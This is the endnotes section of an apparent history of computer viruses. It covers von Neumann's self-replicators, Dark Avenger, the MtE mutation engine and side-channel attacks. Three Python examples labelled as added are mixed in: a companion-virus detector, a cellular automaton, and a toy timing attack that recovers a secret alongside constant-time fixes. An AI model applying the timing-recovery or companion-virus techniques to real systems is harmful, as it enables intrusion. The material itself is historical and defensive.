“ethical virus writing”: On the distinction between the hacking and the antivirus communities, see Richard Ford and Sarah Gordon, “When Worlds Collide,” Proceedings of the 1st International Virus Bulletin Conference, 1999. There have been prominent exceptions to the practice of not hiring virus writers. See, e.g., the case of Sven Jaschan, writer of the destructive NetSky and Sasser worms, hired by German security company Securepoint: John Leyden, “Sasser Author Gets IT Security Job ‘Second Chance,’” The Record, September 20, 2004.
“Is it a virus”: A Trojan, named after a Trojan horse, is a malicious program that hides inside a legitimate program. Unlike viruses, Trojans are not self-replicating.
an infectious program: “A virus breaks into a healthy cell and replaces that cell’s DNA with its own; so instead of producing healthy cells, the cell now produces more viruses—which go out and infect more cells. A VIRUS program does the same thing, only with computers instead of cells.” David Gerrold, When HARLIE Was One (Release 2.0) (New York: Bantam, 1988): 209–10. The novel was originally published in 1972.
as a joke: Introduction to 2014 edition: “When HARLIE Was One is also the novel that introduced the concept of the computer virus to popular thought. For that I am profoundly sorry.”
now called malware: According to some, malware was coined in 1990 by the Israeli computer-science professor Yisrael Radai, in a public posting: “Trojans constitute only a very small percentage of malware (a word I just coined for trojans, viruses, worms, etc.).” See, e.g., Ellen Messmer, “The Origins of High-Tech’s Made Up Lingo,” June 25, 2008, https://www.pcworld.idg.com.au/article/226443/origins_high-tech_made-up_lingo/?pp=2. I have not been able to verify this claim.
self-reproducing code: For formal definitions, see Frederick B. Cohen, “Computer Viruses” 16–18 (PhD diss., University of Southern California, 1985); Len Adleman, “An Abstract Theory of Computer Viruses,” Lecture Notes in Computer Science 403 (1990).
possibility of good viruses: See, e.g., Eugene Spafford, “Response to Fred Cohen’s ‘Contest,’” Sciences 4 (January/February 1992). It should be noted that given Cohen’s definition, which privileges self-replication, package installers are viruses because they are self-replicating—they copy themselves onto your hard drive when you download them—and are good because they install packages.
Latin word: Lester Brown, ed., The New Shorter Oxford English Dictionary, vol. 2 (Oxford: Oxford University Press, 1993), 3587.
came to regret it: The term virus was coined by Cohen’s adviser, Leonard Adleman. See Sabrina Pagnotta, “Professor Len Adleman Explains How He Coined the Term ‘Computer Virus,’” WeLiveSecurity, November 2, 2017, https://www.welivesecurity.com/2017/11/01/professor-len-adleman-explains-computer-virus-term/. On Cohen’s dissatisfaction with the terminology, see Cohen, It’s Alive, 10. In media studies, Henry Jenkins has also rejected the term viral media in favor of the more neutral spreadable media. See Henry Jenkins, Spreadable Media: Creating Value and Meaning in a Networked Culture (New York: NYU Press, 2013).
beneficial viruses: See, e.g., Frederick B. Cohen, “Friendly Contagion: Harnessing the Subtle Power of Computer Viruses,” The Sciences, September/October 1991, 22–28; Frederick B. Cohen, A Case for Benevolent Viruses (Fred Cohen & Associates, 1991), http://www.all.net/books/integ/goodvcase.html. See also Julian Dibbell, “Viruses Are Good for You,” Wired, February 1995.
caused by HIV: Leonard Adleman claimed that HIV was the inspiration for the term computer virus: “I would meet with Fred on a regular basis to discuss this, and I at the same time was doing research on HIV in a molecular biology lab. So viruses and how they worked were sort of much in my mind, and I was reading a lot about molecular biology at that time. And so somewhere along the line during our discussions I started calling these things computer viruses.” See Pagnotta, “Professor Len Adleman Explains.”
earliest definition: See, e.g., Eugene H. Spafford, “The Internet Worm Incident,” in G. Gheez and J. A. McDermid, Lecture Notes in Computer Science #387 (Berlin: Springer-Verlag, 1989), 447: “A worm is a program that can run independently and can propagate a fully working version of itself to other machines. It is derived from the word tapeworm, a parasitic organism that lives inside a host and uses its resources to maintain itself. A virus is a piece of code that adds itself to other programs, including operating systems. It cannot run independently—it requires that its ‘host’ program be run to activate it. As such, it has an analog to biological viruses—those viruses are not considered alive in the usual sense; instead, they invade host cells and corrupt them, causing them to produce new viruses.”
must infect a cell: See, e.g., Spafford, “Computer Viruses,” 4: “Worms do not change other programs, although they carry other code that does, such as a true virus … The fact that worms do not modify existing programs is a clear distinction between viruses and worms.”
stand-alone personal computers: That worms leverage network connections, whereas ordinary viruses do not, leads to certain predictions. For example, it is predictable that not only will worms infect networks, but they will seek to infect hosts only once. Once a worm infects a host, it has established its toehold from which to scan and attack new hosts. Viruses, by contrast, lead to local infections. They might spread to other machines, but they require users to do so. Because viruses infect local resources, viruses will predictably seek to infect as many files as they can on a local machine, or floppy disk. Ordinary viruses infest local machines and disks, whereas worms want to be the sole malware on a host.
runs autonomously: More precisely, when the worm found a vulnerable host, it sent a small program—the bootstrap code—to the machine and executed it. The bootstrap code, in turn, sent for copies of the main worm files and turned them on.
it spreads the virus: As Teodor Prevalsky showed when he created companion viruses, viruses can spread even if they do not infect a program. By giving them names of legitimate files, viruses can fool users into executing them, thus starting a new cycle of self-replication and propagation.
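The companion trick in the “lost business” note above and the point repeated here both turn on one rule: when the user omits the extension, DOS tries .COM before .EXE. The following is an added example, not code from the book, that models that resolution order over a constructed directory listing and uses the same rule as a defender’s check, flagging every .COM that shadows an .EXE of the same name in the same directory. The directory names, file names and PATH order are all constructed.

```python
from typing import Dict, List, Optional, Tuple

# Extensions DOS tries, in order, when the user types a bare command name.
DOS_SEARCH_ORDER = (".COM", ".EXE", ".BAT")

# Constructed listing: directory -> files it contains. WINWORD.COM is the
# companion that a virus would plant beside the real WINWORD.EXE.
LISTING: Dict[str, List[str]] = {
    "C:\\WORD": ["WINWORD.EXE", "WINWORD.COM", "SPELL.EXE"],
    "C:\\DOS": ["FORMAT.COM", "EDIT.COM", "XCOPY.EXE"],
}
PATH_DIRS = ["C:\\WORD", "C:\\DOS"]


def resolve_dos_command(command: str, path_dirs: List[str],
                        listing: Dict[str, List[str]]) -> Optional[str]:
    """Return the 'DIR\\NAME.EXT' DOS would run for a bare command, or None.

    Directories are searched in order; within each, .COM beats .EXE beats .BAT.
    DOS file names are case-insensitive, so everything is compared upper-cased.
    """
    base = command.upper()
    for d in path_dirs:
        names = {n.upper() for n in listing.get(d, [])}
        for ext in DOS_SEARCH_ORDER:
            if base + ext in names:
                return f"{d}\\{base}{ext}"
    return None


def find_companions(listing: Dict[str, List[str]]) -> List[Tuple[str, str, str]]:
    """Flag (directory, shadowing .COM, shadowed .EXE) triples.

    A .COM sitting next to an .EXE of the same basename is exactly the
    footprint a companion virus leaves; legitimate pairs exist but are rare
    enough that each hit deserves a look.
    """
    hits: List[Tuple[str, str, str]] = []
    for d, names in listing.items():
        upper = {n.upper() for n in names}
        for n in sorted(upper):
            if n.endswith(".EXE") and n[:-4] + ".COM" in upper:
                hits.append((d, n[:-4] + ".COM", n))
    return hits


if __name__ == "__main__":
    print("winword ->", resolve_dos_command("winword", PATH_DIRS, LISTING))
    print("xcopy   ->", resolve_dos_command("xcopy", PATH_DIRS, LISTING))
    for d, com, exe in find_companions(LISTING):
        print(f"{d}: {com} shadows {exe}")
```

Typing the full name with its extension, winword.exe, sidesteps the companion, which is why the trick depends on the habit of typing bare command names; the check in find_companions is the inverse of the virus’s own search for executables to pair with.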
“Eddie lives”: Dark Avenger acknowledged authorship of the virus in a 1991 interview. Mungo and Clough, Approaching Zero, 135.
data diddling viruses: Eddie was not only more destructive than Teodor’s virus, it was much more sophisticated. Vienna is known as a direct infector. A direct infector infects when it is run. When the program stops, so does the virus. Eddie, however, was an indirect infector. When executed, it lurked in memory waiting to ambush loaded programs. Indeed, Eddie would wait until an antivirus program was run. As the scan began, it would infect every file on the disk. The only way to stop Eddie from infecting every loaded program was to turn off the computer.
“I would say that”: Sudetic, “Bulgarians Linked.”
not on the list: Although Dark Avenger wrote Nomenklatura, as it became known, it was not found in Bulgaria. Dark Avenger had uploaded it to a U.K. virus exchange via FidoNet and released it there.
“His work is elegant”: David Briscoe, “Bulgarian Virus Writer, Scourge in the West, Hero at Home,” Associated Press, January 29, 1993, https://apnews.com/0cf9f58cce078624b05d563cc33daaaa.
crashed the system: See Yisrael Radai, “The Israeli PC Virus,” Computer & Security 2 (1989): 111–13. For the development of Jerusalem, see Alan Solomon, “A Brief History of PC Viruses (1986–1993),” users.uoa.gr/~nektar/science/technology/a_brief_history_of_viruses.htm.
there was Brain: Saad Hasan, “The Making of the First Computer Virus—The Pakistani Brain,” TRTWORLD, December 18, 2019, https://www.trtworld.com/magazine/the-making-of-the-first-computer-virus-the-pakistani-brain-32296.
doing doctoral research: As Cohen describes his eureka moment: “I was in Len Adleman’s information security class at USC when the proverbial light bulb turned on. I immediately knew that a virus could penetrate and be used to exploit any connected general-purpose system. The only question was how quickly.” He built the virus in eight hours on a VAX-11/750 system running UNIX. Sabrina Pagnotta, “Antimalware Day: Genesis of Viruses … and Computer Defense Techniques,” WeLiveSecurity, October 31, 2017, https://www.welivesecurity.com/2017/10/31/anti-malware-day-genesis-viruses/.
system administrator refused: Frederick B. Cohen, “Computer Viruses” (PhD diss., University of Southern California, 1985), 96–97.
performed useful tasks: John F. Shoch and Jon A. Hupp, “The ‘Worm’ Programs—Early Experience with a Distributed Computation,” Communications of the ACM 25, no. 3 (March 1982): 172.
Born in Budapest: Stanislaw Ulam, “John von Neumann, 1903–1957,” Bulletin of the American Mathematical Society 64, no. 3, pt. 2 (May 1958): 1; George Dyson, Turing’s Cathedral: The Origins of the Digital Universe (New York: Vintage, 2012), chap. 4; Herman Goldstine, The Computer: From Pascal to von Neumann (Princeton, NJ: Princeton University Press, 1980). In 1913, Emperor Franz Joseph ennobled John’s family for his father’s service to the Hapsburgs, adding the honorific Margittai to the family name. (Jonas Neumann de Margittai later Germanized his name to become John von Neumann.)
both degrees simultaneously: Ulam, “John von Neumann,” 2.
Herman Goldstine: Goldstine, The Computer, 167.
youngest faculty member: Mary-Ann Dimand and Robert W. Dimand, The History of Game Theory, Volume 1: From the Beginnings to 1945 (New York: Routledge, 2002), 129.
few branches of mathematics: The American Mathematical Society dedicated a whole issue of articles laying out some of von Neumann’s contributions. See Bulletin of the American Mathematical Society 64, no. 3, pt. 2 (May 1958), especially the Stan Ulam article.
(it weighed thirty tons): Steven Levy, “A Brief History of the ENIAC,” Smithsonian Magazine, November 2013, https://www.smithsonianmag.com/history/the-brief-history-of-the-eniac-computer-3889120/. Levy claims that the ENIAC had 18,000 vacuum tubes, the figure used in the text, but other estimates range from 17,468 to 19,000.
to study natural systems: John von Neumann, Theory of Self-Reproducing Automata, edited and completed by Arthur W. Burks (Champaign: University of Illinois Press, 1966), 64–73.
Von Neumann is also credited: John von Neumann, “A First Draft of a Report on the EDVAC,” IEEE Annals of the History of Computing 15, no. 4 (1993). The credit to von Neumann has been much debated. See Dyson, Turing’s Cathedral, 77–80; B. J. Copeland and Giovanni Sommaruga, “Did Zuse Anticipate Turing and von Neumann?,” in Turing’s Revolution: The Impact of His Ideas about Computability, ed. Giovanni Sommaruga and Thomas Strahm (Basel, Switzerland: Birkhäuser Cham, 2016).
resilience of biological organisms: Von Neumann, Theory of Self-Reproducing, 20.
Descartes was summoned: “Go Forth and Replicate,” Scientific American 285, no. 2 (August 2001): 34–43.
In 1949, von Neumann set out: Von Neumann completed two studies on self-replication. See “The General and Logical Theory of Automata,” in John von Neumann Collected Works, 5:288–328, and “Probabilistic Logics and the Synthesis of Reliable Organisms from Unreliable Components,” in John von Neumann Collected Works, 5:329–378. In 1957, von Neumann passed away, leaving two manuscripts on self-replicating automata unpublished: “Theory and Organization of Complicated Automata,” five lectures delivered at the University of Illinois, December 1949, and “The Theory of Automata: Construction, Reproduction, Homogeneity,” started in 1952 and worked on for a year. His colleague Arthur Burks edited the manuscripts and filled in missing details. The book was published nine years later by the University of Illinois Press, with the first manuscript being part 1 and the second part 2. See von Neumann, Theory of Self-Reproducing, xv–xix.
Just as Turing: For the relationship between Turing’s and von Neumann’s projects, see Barry McMullin, “What Is a Universal Constructor,” Dublin City University School of Electronic Engineering Technical Report, 1993.
changes the machine the self-replicator is trying to copy: Von Neumann, Theory of Self-Reproducing, 122–23. The problem for von Neumann was particularly stark because he built his self-replicator as a cellular automaton. A cellular automaton is a collection of cells arranged in a grid. Each cell can be in a finite number of states. (Von Neumann’s cells could be in twenty-nine different states.) A cell’s internal state changes according to a fixed rule. The rule determines the new internal state of each cell in terms of the current internal state of the cell and the internal states of the neighboring cells. Each cell is therefore reactive to its surroundings: its internal state is changed by those of neighboring cells. Copying the cellular automaton cell by cell would, however, require inspecting each cell, which in turn would require crossing into its neighborhood. This inspection would change the states around the observed cell. The solution to this problem, as we see above, is to use a tape—a description of the automaton—and place that tape in a “frozen,” quasi-quiescent portion of the grid, so inspection of the tape does not change its states. But see Richard Laing, “Automaton Models of Reproduction by Self-Inspection,” Theoretical Biology 66 (1977), 437–56, describing a kinetic self-replicator that inspects itself for a model.
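The cell-and-neighborhood rule this note defines, as an added example that is not from the book or from von Neumann’s own construction: a two-state rule (Conway’s Life, an assumption standing in for the twenty-nine-state rule) is stepped on a constructed grid, and a probe function shows the point the note makes, that placing an extra “inspector” cell inside a pattern’s neighborhood changes what the pattern becomes.

```python
"""Minimal 2-D cellular automaton stepper (added example).

The transition rule is Conway's Life, chosen only to make the definition
concrete; it is an assumption, not von Neumann's 29-state rule.  A live
cell is state 1; any cell absent from the grid is state 0.
"""
from typing import Callable, FrozenSet, List, Tuple

Cell = Tuple[int, int]
Grid = FrozenSet[Cell]               # set of live cells
Rule = Callable[[int, int], int]     # (current state, live neighbours) -> new state


def neighbours(cell: Cell) -> List[Cell]:
    """The eight cells surrounding `cell` (Moore neighbourhood)."""
    r, c = cell
    return [(r + dr, c + dc)
            for dr in (-1, 0, 1) for dc in (-1, 0, 1)
            if (dr, dc) != (0, 0)]


def life_rule(state: int, live_neighbours: int) -> int:
    """New state of a cell from its own state and its neighbours' states."""
    if state == 1:
        return 1 if live_neighbours in (2, 3) else 0
    return 1 if live_neighbours == 3 else 0


def step(grid: Grid, rule: Rule = life_rule) -> Grid:
    """Apply `rule` to every cell once, reading only the *current* states."""
    candidates = set(grid)
    for cell in grid:
        candidates.update(neighbours(cell))   # only cells near a live cell can change
    new = set()
    for cell in candidates:
        count = sum(1 for n in neighbours(cell) if n in grid)
        if rule(1 if cell in grid else 0, count):
            new.add(cell)
    return frozenset(new)


def run(grid: Grid, generations: int, rule: Rule = life_rule) -> Grid:
    for _ in range(generations):
        grid = step(grid, rule)
    return grid


# Constructed input: a "blinker", three cells in a row, which oscillates with period 2.
BLINKER: Grid = frozenset({(1, 0), (1, 1), (1, 2)})


def inspection_disturbs(pattern: Grid, probe: Cell, rule: Rule = life_rule) -> bool:
    """True if adding a single extra cell `probe` changes what `pattern`
    becomes after one step: the note's point that inspecting a cell from
    inside its neighbourhood alters the states being inspected."""
    return step(pattern, rule) != step(pattern | {probe}, rule)


if __name__ == "__main__":
    print(sorted(run(BLINKER, 1)))                    # vertical blinker
    print(inspection_disturbs(BLINKER, (0, 0)))       # True: probe inside the neighbourhood
    print(inspection_disturbs(BLINKER, (5, 5)))       # False: probe far away dies alone
```

The probe at (0, 0) touches three cells of the blinker, so the next generation differs from the undisturbed one; a probe at (5, 5) has no live neighbors, dies, and leaves the blinker’s evolution untouched. That distance is what von Neumann’s “frozen” tape region buys the self-replicator.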
Von Neumann wisely decided: Von Neumann originally began with a kinematic, not an abstract, mathematical model: von Neumann, Theory of Self-Reproducing, 81–83. By 1953, he gave up on the kinematic model. Von Neumann, Theory of Self-Reproducing, 93–99.
“universal constructor”: Von Neumann, Theory of Self-Reproducing, 271. As Christopher Langton noted, universal construction is not necessary for self-replication. Von Neumann built one because he was interested in sufficient conditions for self-replication, not necessary ones. Christopher G. Langton, “Self-Reproduction in Cellular Automata,” Physica D 10 (1984): 135–44.
“cellular automaton”: On cellular automata, see von Neumann, Theory of Self-Reproducing.
two hundred thousand cells: John von Neumann never finished his automaton. The most complete “organ” of his self-replicator that he produced was the Memory Control (MC) unit. The MC and the linear array (L) that contains the “blueprint” make up the “tape unit” (MC + L); the entire universal constructor (UC) is the tape unit plus a constructing unit (CU): UC = CU + (MC + L). The MC that von Neumann describes is originally intended to be 547 cells tall and 87 cells wide, for a total of 87,589 cells. This version included some minor errors. With minimal edits from Burks to make it function as needed without error, it is 547 cells wide and 337 cells tall, for a total of 184,339 cells in its initial quiescent state. The majority of these cells will always be “buffer cells,” so Burks suggests two alternative designs (261–65; 277–79). It seems fair to say that without extreme deviation from von Neumann’s actual work, his UC (excluding the tape) would have taken around 150,000–200,000 cells to implement. Some cellular automaton enthusiasts don’t include the size of the tape when counting the cells it takes to implement a self-replicator. The most optimistic possible lower bound on the size of a tape that could possibly encode the states of ~200,000 cells (in von Neumann’s 29-state cellular automaton) is roughly 5*200,000 = 1M cells. For the first complete implementation of the von Neumann self-replicator, see Umberto Pesavento, “An Implementation of von Neumann’s Self-Reproducing Machine,” Artificial Life 2: 337–54 (1995).
self-replication is possible: Von Neumann, Theory of Self-Reproducing, 118.
internal blueprint: For the construction of the tape, see von Neumann, Theory of Self-Reproducing, 114–18.
two parts: Von Neumann, Theory of Self-Reproducing, 118–19. On page 85, written earlier, von Neumann identified the copying first, then construction.
Philosophers have long noted: Gideon Yaffe, Manifest Activity: Thomas Reid’s Theory of Action (Oxford: Clarendon Press, 2004), 79.
self-replicating entities: The internal blueprint need not be fixed, but can be composed dynamically through self-inspection. See, e.g., Jesús Ibáñez et al., “Self-Inspection Based Reproduction in Cellular Automata,” Lecture Notes in Artificial Intelligence 929 (1995): 564–76. In cases of self-inspecting self-replicators, the self-replicator “contains” a blueprint in the trivial sense that it is the blueprint.
Sarah Gordon: Email correspondence between Scott Shapiro and Sarah Gordon, June 2021, and telephone interview, June 7, 2021.
first personal computer: See Hal Stucker, “Among the Virus Thugs,” Wired, March 25, 1997, https://www.wired.com/1997/03/among-the-virus-thugs-2/.
Ping-Pong virus: Ping-Pong A targeted floppy drives; Ping-Pong B infected the hard disk’s boot sector. For a demonstration of the Ping-Pong virus, see www.youtube.com/watch?time_continue=52&v=yxHalzuPyi8&feature=emb_logo.
“polymorphic virus engine”: Mark Washburn had written a polymorphic virus, known as 1260, as early as 1990. See Fridrik Skulason, “1260—the Variable Virus,” Virus Bulletin, December 1991. The 1260 was a variant of Vienna.
genetic variations: Source code and documentation: https://github.com/bnjf/mte.
infects a new file: A random number generator is not part of the MtE object module. Dark Avenger, however, did include a sample pseudo–random number generator with the archive. A virus writer could supply their own random number generator. See Tarkan Yetiser, “Mutation Engine Report,” June 1992, http://web.archive.org/web/20101222120543/http://vXheavens.com/lib/ayt00.html.
shaggy-dog twists: A file infected by an MtE-mutated virus has six parts. The first section is just one byte long: it contains the instruction to jump to the end of the file, where the generator resides. The second part contains the original file without its first byte. The third part is the decryptor, the fourth is the encrypted virus code, and the fifth is the original first byte of the uninfected file. The sixth section contains the mutation engine. When the virus executes, it jumps to the generator at the end of the file, which then executes the decryptor in the middle. The decryptor decrypts the body of the encrypted virus next to it and restores the original first byte of the file. http://www.ece.ubc.ca/~irenek/techpaps/virus/IMG00014.GIF.
years to develop: According to Alan Solomon, the MtE itself was not successful: “At first, it was expected that there would be lots and lots of viruses using the MtE, because it was fairly easy to use this to make your virus hard to find. But the virus authors quickly realised that a scanner that detected one MtE virus, would detect all MtE viruses fairly easily. So very few virus authors have taken advantage of the engine (there are about a dozen or two viruses that use it).” Alan Solomon, “A Brief History of PC Viruses (1986–1993),” users.uoa.gr/~nektar/science/technology/a_brief_history_of_viruses.htm. Nevertheless, mutation engines would go on to cause huge problems for the industry: “Early in 1993,… Masouf Khafir wrote a polymorphic engine called the Trident Polymorphic Engine,… [which] is much more difficult to detect reliably than the MtE, and very difficult to avoid false alarming on.… The main events of 1993 were the emergence of an increasing number of polymorphic engines, which will make it easier and easier to write viruses that scanners find difficult to detect.”
doing viruslike actions: Legitimate processes, such as Digital Rights Management programs used as copy protection, also engage in viruslike behavior.
code needs energy: Exploiting the physical properties of a computing device is known as a side-channel attack. A side-channel attack does not strike at downcode directly, by exploiting software bugs; it does so indirectly, by observing how software runs on hardware and deducing sensitive information from these physical observations. Here are three examples of side-channel attacks. 1) Power analysis attacks: Like all computer programs, an encryption algorithm requires energy to run. However, that energy is not constant; the voltage of the semiconductors, for instance, will fluctuate depending on the contents of the code being executed. In other words, the encryption key located in the encryption algorithm downcode leaves a trace in the computer’s physical processes. By observing the fluctuation in electrical current, hackers can deduce the encryption key, thereby gaining access to the encrypted content. See generally Paul Kocher, Joshua Jaffe, and Benjamin Jun, “Introduction to Differential Power Analysis and Related Attacks,” Cryptography Research, 1998, https://www.rambus.com/wp-content/uploads/2015/08/DPATechInfo.pdf. 2) Timing attacks: Timing attacks function similarly to power analysis attacks in that they use the physical processes of a computer to detect leaked information indirectly. Imagine your phone password is 224466. To check whether a password is correct, the device could simply check the first digit of the password. If it’s not a 2, the device would determine that the password is incorrect. If it is a 2, the device would then move on to the next digit and repeat the process. Because checking each digit takes time, it takes longer to reject the password 200000 than to reject 100000. It takes even longer to reject 224465. A timing attack takes advantage of this timing information to deduce your password. If I observe that “200000” takes longer to check than “100000,” I can deduce that your password starts with a 2. Digit by digit, I can deduce your entire password—all without ever accessing the memory where the password is stored. See, e.g., Paul C. Kocher, “Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems,” in Advances in Cryptology—CRYPTO ’96, ed. Neal Koblitz, 16th Annual International Cryptology Conference (Heidelberg: Springer, 1996): 104–13. 3) Fault attacks: In power analysis and timing attacks, hackers deduce code. In a fault attack, the hacker can use the physical properties of the hardware to change code. Rowhammer, for example, exploits the fact that individual RAM cells can leak their physical charge to nearby cells. A RAM cell’s contents are binary and determined by its charge; a charged cell has a value of “1,” while a discharged cell stores a value of “0.” Leaking physical charge, then, can change content. By accessing a row of memory repeatedly in rapid succession, you can influence secure data. Yoongu Kim et al., “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors,” 2014 ACM/IEEE 41st International Symposium on Computer Architecture, 361–72; Mark Seaborn, “Exploiting the DRAM Rowhammer Bug to Gain Kernel Privileges,” Google Project Zero (blog), March 9, 2015, https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html. In 2016, for instance, it was reported that Rowhammer attacks could be used to root Android phones (the equivalent of “jailbreaking an iPhone” for Android)—despite the fact that Android downcode prevents root access. See Dan Goodin, “Using Rowhammer Bitflips to Root Android Phones Is Now a Thing,” Ars Technica, October 23, 2016, https://arstechnica.com/information-technology/2016/10/using-rowhammer-bitflips-to-root-android-phones-is-now-a-thing/. Note that a polygraph, in which the tester monitors physiological reactions such as heart rate, blood pressure, and skin conductivity to determine whether the subject is lying, is itself a side-channel attack.
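The digit-by-digit password check this note describes, placed beside the constant-time check that closes the leak, as an added example that is not from the book. Rather than timing a modern CPU (too noisy for a short demo), each checker reports how many digit comparisons it performed, which is the quantity a timing attack measures; the password 224466 is the note’s own, and the recovery routine is a model of the deduction the note walks through, included to show that it works only against the early-exit checker.

```python
"""Early-exit versus constant-time secret comparison (added example).

Each checker returns (matched, comparisons_performed).  The comparison
count stands in for elapsed time: an attacker cannot read the secret,
but can observe how long the check took.
"""
import hmac
from typing import Callable, Tuple

Checker = Callable[[str], Tuple[bool, int]]


def early_exit_check(secret: str, guess: str) -> Tuple[bool, int]:
    """The leaky check from the note: stop at the first mismatching digit.
    Work done depends on how long a prefix of the guess is correct."""
    comparisons = 0
    if len(secret) != len(guess):
        return False, comparisons
    for s, g in zip(secret, guess):
        comparisons += 1
        if s != g:
            return False, comparisons
    return True, comparisons


def constant_work_check(secret: str, guess: str) -> Tuple[bool, int]:
    """Mitigation: compare every position and accumulate the differences,
    so the work done is the same for every wrong guess of the right length."""
    comparisons = 0
    if len(secret) != len(guess):
        return False, comparisons
    diff = 0
    for s, g in zip(secret, guess):
        comparisons += 1
        diff |= ord(s) ^ ord(g)          # no data-dependent early exit
    return diff == 0, comparisons


def hardened_check(secret: str, guess: str) -> bool:
    """What production code should call: the standard library's
    constant-time comparison (hmac.compare_digest)."""
    return hmac.compare_digest(secret.encode(), guess.encode())


def recover_by_work_count(check: Checker, length: int, alphabet: str = "0123456789") -> str:
    """Model of the deduction in the note: for each position, keep the digit
    that made the checker do the most work.  The final digit is confirmed by
    an accepted guess, not by work count.  Against a constant-work checker
    every digit ties, so the routine just returns the first digit repeated."""
    known = ""
    for _ in range(length):
        best_digit, best_work = alphabet[0], -1
        for d in alphabet:
            guess = (known + d).ljust(length, alphabet[0])
            ok, work = check(guess)
            if ok:
                return guess
            if work > best_work:
                best_digit, best_work = d, work
        known += best_digit
    return known


if __name__ == "__main__":
    SECRET = "224466"                                  # constructed sample, from the note
    for g in ("100000", "200000", "224465", "224466"):
        print(g, early_exit_check(SECRET, g), constant_work_check(SECRET, g))
    print(recover_by_work_count(lambda g: early_exit_check(SECRET, g), 6))      # 224466
    print(recover_by_work_count(lambda g: constant_work_check(SECRET, g), 6))   # 000000
```

Against `early_exit_check`, 100000 costs one comparison, 200000 two, and 224465 six, exactly the ordering the note relies on; against `constant_work_check` every six-digit guess costs six, and the recovery routine learns nothing. The length check in both functions still leaks the secret’s length; a real implementation compares fixed-length hashes so that even this is uniform.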
“The first and most important”: Vesselin Bontchev, “The Bulgarian and Soviet Virus Factories,” Proceedings of the 1st International Virus Bulletin Conference, 1991, 11–25.
copying Western computers: For a comprehensive history of the Bulgarian computer industry, see Victor P. Petrov, “A Cyber-Socialism at Home and Abroad: Bulgarian Modernisation, Computers, and the World, 1967–1989” (PhD diss., Columbia University, 2017).
“In the U.S.A.”: David S. Bennahum, “Heart of Darkness,” Wired, November 1, 1997, https://www.wired.com/1997/11/heartof.
socialist bloc: Bennahum, “Heart of Darkness.”
U.S. Constitution: Cf. Robert J. Kroczynski, “Are the Current Computer Crime Laws Sufficient or Should the Writing of Virus Code Be Prohibited?,” Fordham Intellectual Property, Media and Entertainment Law Journal, 2008.
purely DOS viruses: One significant problem is proving mental state. The CFAA of 1986 required “knowingly” or “intentionally” for each particular act. Congress attempted to respond to the problem of viruses in the Virus Eradication Act of 1989, which was voted out by House and Senate committees but died. See Raymond L. Hansen, “The Computer Virus Eradication Act of 1989: The War Against Computer Crime Continues,” Software Law Journal, 1990, 717–53.
Katrin Totcheva: Zoom (audio) interview with author, November 20, 2020.
Princess Diana: The Iron Maiden titles “Somewhere in Time,” “The Evil That Men Do,” “Only the Good Die Young,” and “The Number of the Beast” all make cameos in his viruses. In Eddie, the string Diana P. appears. Diana is not a common Bulgarian name.
her subjects: Sarah Gordon, “The Generic Virus Writer,” vX Heaven, September 1994, https://ivanlef0u.fr/repo/madchat/vxdevl/papers/avers/gvw1.html. On viruses in the wild, see Sarah Gordon, “What Is Wild?,” 20th National Information Systems Security Conference, 1997, csrc.nist.gov/csrc/media/publications/conference-paper/1997/10/10/proceedings-of-the-20th-nissc-1997/documents/177.pdf.
“in the wild”: Gordon, “What Is Wild?”
Another possibility was suggested by: Personal communication, Peter Radatti, June 10, 2021.
the same barriers: Alice Hutchings and Yi Ting Chua, “Gendering Cybercrime,” in Cybercrime Through an Interdisciplinary Lens, ed. Thomas J. Holt (New York: Routledge, 2016), 167–88. For contemporaneous reports, see Sascha Segan, “Facing a Man’s World: Female Hackers Battle Sexism to Get Ahead,” ABC News, accessed May 27, 2020, https://web.archive.org/web/20000815232927/http://www.abcnews.go.com/sections/tech/DailyNews/hackerwomen000602.html. See more generally Christina Dunbar-Hester, Hacking Diversity: The Politics of Inclusion in Open Technology Cultures (Princeton, NJ: Princeton University Press, 2019).
regular contact: Sarah Gordon, “Inside the Mind of Dark Avenger,” Cryptohub, January 1993, https://cryptohub.nl/zines/vxheavens/lib/asg02.html.
(with Dark Avenger’s permission): Gordon, “Inside the Mind.”
“Please, let’s not talk”: Gordon, “Inside the Mind.”
When I asked: Interview VB.
Dark Avenger’s true identity: Pauline Boudry, Copy Me—I Want to Travel, 2004.
hostile response: Bennahum, “Heart of Darkness.”
was leaked: The footage was licensed by Don Thrasher, Rick Salomon’s friend, to Marvad, an Internet pornography shop, for $50,000 in August 2003. “Paris Pal Sells Sex Tape for $50,000,” The Smoking Gun, November 17, 2003, https://www.thesmokinggun.com/documents/crime/paris-pal-sold-sex-tape-50k. According to the licensing agreement, “WHEREAS, Solomon [sic] wishes to clear his good name and wishes to prove to the public that he is honest, that the Video does exist, and that the content of the Video demonstrates Hilton’s desire for the same to be viewed by third parties; WHEREAS, Solomon granted LICENSOR [Thrasher] a perpetual non-exclusive worldwide transferrable license…,” https://www.thesmokinggun.com/file/paris-pal-sold-sex-tape-50k.
without her consent: Constance Grady, “Paris Hilton’s Sex Tape Was Revenge Porn. The World Gleefully Watched,” Vox, May 25, 2021, www.vox.com/culture/22391942/paris-hilton-sex-tape-revenge-porn-south-park-stupid-spoiled-whore-video-play-set-pink-stupid-girl.
As venal: John Leland, “Once You’ve Seen Paris, Everything Is E = mc2,” The New York Times, November 23, 2003.
for a reported $400,000: Salomon sued Hilton, her family, and her publicist for defamation, alleging that they had waged a “cold, calculated and malicious campaign to portray Salomon as a rapist” to protect her image. “Heiress Sued Over Sex Tape,” CBSNews.com, November 20, 2003, https://www.cbsnews.com/news/heiress-sued-over-sex-tape. Hilton sued the distribution company for invading her privacy, but a judge dismissed her suit. “LA Court Demolishes Paris Hilton,” The Record, July 13, 2004, https://www.theregister.com/2004/07/13/hilton_lawsuit_dismissed. Rick Salomon then dropped his suit as part of the settlement. Stephen M. Silverman, “Hilton, Salomon End Sex-Tape Legal Battle,” People, July 13, 2004; Gary Susman, “Paris Hilton Donates Porn Proceeds to Charity,” Entertainment Weekly, July 13, 2004, https://ew.com/article/2004/07/13/paris-hilton-donates-porn-proceeds-charity.
pictures, emails, notes, and contacts: Samantha Martin, “Massachusetts Teen Convicted for Hacking into Internet and Telephone Service Providers and Making Bomb Threats to High Schools in Massachusetts and Florida,” U.S. Department of Justice, District of Massachusetts, September 8, 2005, web.archive.org/web/20130415114032/http://www.justice.gov/criminal/cybercrime/press-releases/2005/juvenileSentboston.htm.
